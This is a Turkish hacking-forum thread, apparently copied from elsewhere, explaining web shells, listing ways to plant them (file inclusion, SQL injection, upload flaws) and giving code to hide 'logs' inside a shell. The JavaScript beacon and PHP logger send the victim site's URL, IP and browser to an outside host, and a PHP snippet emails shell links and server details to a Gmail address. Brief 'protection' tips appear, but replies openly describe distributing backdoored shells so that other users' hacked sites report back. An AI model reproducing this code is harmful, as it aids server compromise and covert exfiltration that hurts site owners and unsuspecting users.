Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Shele log koyma
#1
ALINTIDIR !


Selamun aleyküm



Bugün Shell Nedir Shell Log Çeşitleri Ve Yeni Yöntemi Göstereceğim

Öncelikle Bu konuyu açma Sebebim Bu durumdan Nasıl Korunmanız Gerektiğidir..

..
Shell Nedir
Shell sunucuya Yüklediğimiz Taktirde Belirli yetkiler veren Scripttir.
Shell Bazen Admin Yetkilerini Kullanırken Bazen Tam Yetki Yani Host Yetkisi Olur

Permleri (Persmissionları) Açık Olan Bir Sunucuda İstediğiniz Bütün Dosya ve Klasöri
Okuyabilir, Silebilir veya Yükleme Yapabilirsiniz. İzinleri Kapalı Bir Sunucuda İse Bu
Yetkiler Sınırlıdır. Tam Yetkiye Ulaşabilmeniz İçin Serveri Rootlamanız Gerekmektedir.

Birde shellde bypass Config çekme Yontemleri vardır. Bunları Az araştırarak bula bilrisiniz
Bu genelde Linux Serverlerde Olur Windows Serverlerde genelde Tüm Permler açıktır.
Konumuz bu olmadıgı için Üstten Alıyorum Belki İleriki Zamnlarda Daha detaylı anlata
bilirim..
shell Nasıl Atılır?

Aşamaları:
* Remote File Iclusion Açıklarından Faydalanabiliriz

* SQL Injection Açıklarından Faydalanabiliriz

* Exploits Kullanarak Yükleme Yapabiliriz

* Upload Açıklarından Faydalanabiliriz

* Logger vb Spy Yazılımlardan Faydalanabiliriz

* Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz

* Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz

Bu Yontemlerle shell Yukleye Biliriz Nasıl Yüklendiği Forumda Var .

Shell Çeşitleri ise “php” “Asp” “Aspx” ve “Cgi” Shell vardır .

Shell ne oldugunu üstten Değindik. Belki ilerleten sürelerde daha detaylı anlata biliriz.

Log Nedir

Log Türkçesi Günlük, işlem/olay listesi, Günlük Tutmak
Anlamındadır .
Tamda Türkçesi Gibidir Kayıt tutar Ve listeler.

Shellde log ise Shell Attıgımız sunucuda Linki Sheli veipmizi Html dosyasına veya Mailimize Gelmesini Saglıyacaktır.
Şimdi bende Bunların Yontemlerini Anlatacağım..

Shell’e Log koymanın 2 Farklı Yontemi Vardır..
Biri Java script Diğeri İse Mail Log Java İle yapılanı hemen hemen Hepimiz Biliyoruzdur..
Ben yinede JavaScrpt Logu anlatacağım ancak gorsellerle değil.

JavaScrpt shell Atma 3 Aşamadan Yapılır.

.js Dosyası Oluşturma
Js yonledireceği php Dosyası
Ve kayırların Tutulacağı txt Dosyası veya html

Js Dosyası Oluşturma

Cw.js diye bir dosya Oluşturarak Java Script Kodumuzu yazıyoruz.

PHP Kod:
Kod:
a=new/**/Image();a.Yasak Kelime#146;http://cw.com/ray.php?a=’+escape(location.href);[/FOTN] 


Şeklinde yazıp Kayıt Ediyoruz..

İkinci Olarak php Dosyamızı Oluşturuyoruz ve ismini Ray.php Şeklinde Dosya açıyoruz.
Bu bunun içine aşağıdai kodları yapıştırıyoruz


PHP Kod:
<?php 

$ip 
$_SERVER[’REMOTE_ADDR’]; 
$tarih date(’d.m.Y H:i:s’); 
$browser getenv(’HTTP_USER_AGENT’); 
$referans $_SERVER[’HTTP_REFERER’]; 
$kayit fopen("cw.txt""a"); 
fputs($kayit"IP: $ip - TARIH: $tarih - Link: $referans - BROWSER: $browser \\\\n "); 
fclose($kayit); 

?>


Son Olarak

Ray.php yazmış Oldğumuz Cyberizm.txt oluşturuyoruz içi boş olarka atıyoruz Shell buraya gelecektir

Tamdır şimdi sistem hazır bundan sonraise
3 dosyayı FTP’ye Atıyoruz
Sonra loglamak isteğimiz php dosyasına aşığıdaki Kodu katıyoruz ..

PHP Kod:
<SCRIPT SRC=http://sitenizinadı.com/log.js></SCRIPT> 







Şeklinde Gelecektir



Bu kodu ekledikden sonra koddaki adresi kendinize göre düzenleyin yane log.js yi nereye attıysanız onun adresini verin yoksa çalışmaz.

Peki Bundan Nasıl Koruna Biliriz
Shelimize Girdiğimiz zaman Ctrl+f Yaparak “js></SCRIPT>” Aratarak Eğer varsa linkteki Her hangi bir yeri bozarak logu bozmuş olursunuz.


Java Logu Bitirdik şimdi Sıra Mail Log

Mail Log

Evet Arkdaslar Pek Kimsenin Bilmediği Mail Loga Geldik Mail Log serverin Mail Sistemini Kullanarak Belirlediğimiz bilgileri Bize yollicaktır . Şuanda Az Bilinen Bir yontem .
Bizimki Bize
İp:
Time:
Link
Yollicaktır Siz Geliştire bilirsiniz
En basidinden
>’.php_uname().’<
Yazarak Kernel bilgisine Server bilgisine Ulaşabilirsiniz.

Kullanımı Çok basittirMantıgını anlattım.
Yapmamız gerek Tek şey uygun bir tag arasına koymak
En uygunu
<?php Hemen Altındaki Satıra Kopyalamanız yeterlidir.
Kodumuz

PHP Kod:
if ($admin[’check’]) {
    if (
$doing == ’login’) {
        if (
$admin[’pass’] == $password) {
            
scookie(’kyobin’$password);
            
$time_shell     "" date("d/m/Y - H:i:s") . "";
            
$ip_remote      $_SERVER["REMOTE_ADDR"];
            
$from_shellcode ’shell@’ gethostbyname($_SERVER[’SERVER_NAME’]) . ’’;
            
$to_email       ’yusufk02400@gmail.com’;
               
//
            
$server_mail    "" gethostbyname($_SERVER[’SERVER_NAME’]) . " - " $_SERVER[’HTTP_HOST’] . "";
            
$linkcr        "Link: " $_SERVER[’SERVER_NAME’] . "" $_SERVER[’REQUEST_URI’] . " - IP Excuting: $ip_remote - Time: $time_shell";
            
$header        "From: $from_shellcode
Reply-to: 
$from_shellcode"







Ve Upload Ediyoruz gerekli Tek şey Upload ettiğimiz Dosyaya Girmektir
Ben upload ettim
Basit bir uplaod Scripti Üzerinde yapıyorum ben







Evet şimdi Belirlediğim MaiL’e bakıyorum Bazen 2-3 dk geçikmeli gelebilir ama mutlaka gelecektir.

Şimdi Bakalım Gelmişmi..







Bundan Korunma yolu İse Yine aynı mantık ctrl+f Yaparak to_email Ogesini Arayaral Mail’i bozuyoruz yani bir hecesini silemiz yeterlidir.


Evet arkdaslar gordugunuz gibi geldi Kod geliştirele bilir


SeLametle
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler: '[D3F@C4R]
#2
Eline Sağlık Kardeşim exciting
Beğenenler:
#3
Diline sağlık kardeşim mutlaka oku kiss baştan
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#4
(30-07-2014, Saat: 18:37)BruteForce Adlı Kullanıcıdan Alıntı: Diline sağlık kardeşim mutlaka oku kiss baştan
Shell Kodlayacağım Zaman Cyberizm'de Yönetime Falan Temizini Atarım Diğer Her Tarafa Bunu Okuyup Loglu Dağıtırım kiss Birde Shell loglarım normal shelleri öğrenmeye gelenlere veririm sonra sw'ler kucakta kiss kiss kiss
Eline Sağlık
Beğenenler:
#5
Angel.php örneğini veriyim sana angel php içine log koyarak cyberizmde hiç birzaman yapma diğer hack sitelerinde paylaşarak hacklediği sitelerin direk mail yoluyola shell yolu vericektir kardeşim kiss
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler: '[D3F@C4R]
#6
Şimdi Az Önce Dedim Ki Eger Sen Yazdıysan Eyvallah Eline Saglık Ama Eger Alıntı Yapıyorsan Alıntı Diye Yaz ki Milletin Emegine Saygısızlık Etmiş Olmayasın 2. Paylasımın Birebir Alıntı Ama Hala Yazmıyorsun Alıntı Diye Her Ne Kadar Muhatap Olmasamda Forumun Bekası Icın Yaptıgın Paylasımlar Alıntıysa Alıntı Diye Yaz.
Beğenenler:
#7
Teşekkür ederim mustafa abi.
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Shell'e şifre koyma CyberAngel 8 283 20-10-2016, Saat: 06:15
Son Yorum: marlbro35
  Shell Adresine Şifre Koyma + Videolu Anlatım KingSkrupellos 5 896 22-02-2016, Saat: 10:49
Son Yorum: KingSkrupellos
  Shell Adresine Şifre Koyma 2. Farklı Bir Kod KingSkrupellos 4 1,000 17-05-2015, Saat: 21:55
Son Yorum: Stallk3r
Anahtar Kelimeler

Shele log koyma indir, Shele log koyma Videosu, Shele log koyma Online izle, Shele log koyma Bedava indir, Shele log koyma Yükle, Shele log koyma Hakkında, Shele log koyma Nedir, Shele log koyma Free indir, Shele log koyma Oyunu, Shele log koyma Download


1 Ziyaretçi